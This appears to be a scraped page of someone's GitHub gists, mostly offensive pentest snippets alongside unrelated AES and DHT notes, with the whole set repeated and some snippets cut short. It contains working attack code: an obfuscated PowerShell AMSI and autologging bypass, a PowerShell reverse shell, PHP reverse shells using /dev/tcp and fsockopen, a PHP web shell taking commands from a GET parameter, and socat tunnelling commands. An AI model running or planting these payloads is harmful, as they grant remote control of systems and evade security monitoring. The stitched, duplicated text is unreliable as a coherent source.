podjackel

## OSCE Preparation
http://whitelist1.com/
https://ocw.cs.pub.ro/courses/cns/labs/start
https://windowsexploit.com/blog
https://www.securitysift.com/windows-exploit-development-part-1-basics/
http://6.www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
http://corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://tuts4you.com/e107_plugins/download/download.php?list.17=
https://learnxinyminutes.com/docs/c/
http://www.thegreycorner.com/
http://www.dmi.unipg.it/bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## wmic_cmds.txt
Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

## amsi_and_autologging_bypass.ps1
# My original AMSI bypass - does not attempt to bypass WMF autologging
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Modified AMSI bypass that also bypasses WMF5 autologging.
# This was reported to MS. CreateDelegate simply needs to be added to the "suspicious" signature list.
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)

## gist:ad403cb47466266a504d487a136b0d7a
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */
/*  AES implementation in JavaScript (c) Chris Veness 2005-2011                                   */
/*   - see http://csrc.nist.gov/publications/PubsFIPS.html#197                                    */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */

var Aes = {};  // Aes namespace

/**
 * AES Cipher function: encrypt 'input' state with Rijndael algorithm
 *   applies Nr rounds (10/12/14) using key schedule w for 'add round key' stage

## powershell_reverse_shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);
# $stream = $client.GetStream();
# [byte[]]$bytes = 0..65535|%{0};
# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
# $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
# $sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";
# $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
# $stream.Write($sendbyte,0,

## gist:31d51e8e59ea69c7af7a552d605980e0
local$ socat TCP-LISTEN:2222,bind=127.0.0.1,reuseaddr,fork TCP-LISTEN:2223,reuseaddr
local$ ssh -p 2222 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no localhost
remote$ socat TCP:10.0.2.2:2223 TCP:127.0.0.1:22

## dht-walkthrough.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                podjackel
                / dht-walkthrough.md
            
            
              Created
              September 26, 2018 15:40
                — forked from gubatron/dht-walkthrough.md
            
              
                DHT walkthrough notes
              
          
    DHT Walkthrough Notes

I've put together these notes as I read about DHT's in depth and then learned how the libtorrent implementation based on the Kademlia paper actually works.
What problem does this solve?

400,000,000,000 (400 billion stars), that's a 4 followed by 11 zeros.
The number of atoms in the universe is estimated to be around 10^82.
A DHT with keys of 160 bits, can have 2^160 possible numbers, which is around 10^48

  
## shell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?>
<?php $sock=fsockopen("10.11.0.150",443); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
<?php $output = shell_exec($_GET["cmd"]);echo "<pre>$output</pre>";?>

## soxify
#!/bin/sh
# ./socatchk remote-host remote-port
# crudely shutsdown socat (if running) and then restarts it for new host/port
orport=9050
orlisadr=127.0.0.1

case $1 in
-k|--kill)
for i in $(ls /tmp/soxify*.pid);do
  echo 'Killing pid...'
	http://whitelist1.com/
	https://ocw.cs.pub.ro/courses/cns/labs/start
	https://windowsexploit.com/blog
	https://www.securitysift.com/windows-exploit-development-part-1-basics/
	http://6.www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
	http://corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
	https://tuts4you.com/e107_plugins/download/download.php?list.17=
	https://learnxinyminutes.com/docs/c/
	http://www.thegreycorner.com/
	http://www.dmi.unipg.it/bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	Host Enumeration:

	--- OS Specifics ---
	wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

	wmic computersystem LIST full

	--- Anti-Virus ---

	wmic /namespace:\\root\securitycenter2 path antivirusproduct
	# My original AMSI bypass - does not attempt to bypass WMF autologging
	[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

	# Modified AMSI bypass that also bypasses WMF5 autologging.
	# This was reported to MS. CreateDelegate simply needs to be added to the "suspicious" signature list.
	[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
	/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
	/* AES implementation in JavaScript (c) Chris Veness 2005-2011 */
	/* - see http://csrc.nist.gov/publications/PubsFIPS.html#197 */
	/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */

	var Aes = {}; // Aes namespace

	/**
	* AES Cipher function: encrypt 'input' state with Rijndael algorithm
	* applies Nr rounds (10/12/14) using key schedule w for 'add round key' stage
	$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

	# $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);
	# $stream = $client.GetStream();
	# [byte[]]$bytes = 0..65535\|%{0};
	# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
	# $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
	# $sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
	# $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
	# $stream.Write($sendbyte,0,
	local$ socat TCP-LISTEN:2222,bind=127.0.0.1,reuseaddr,fork TCP-LISTEN:2223,reuseaddr
	local$ ssh -p 2222 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no localhost
	remote$ socat TCP:10.0.2.2:2223 TCP:127.0.0.1:22
	<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?>
	<?php $sock=fsockopen("10.11.0.150",443); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
	<?php $output = shell_exec($_GET["cmd"]);echo "<pre>$output</pre>";?>
	#!/bin/sh
	# ./socatchk remote-host remote-port
	# crudely shutsdown socat (if running) and then restarts it for new host/port
	orport=9050
	orlisadr=127.0.0.1

	case $1 in
	-k\|--kill)
	for i in $(ls /tmp/soxify*.pid);do
	echo 'Killing pid...'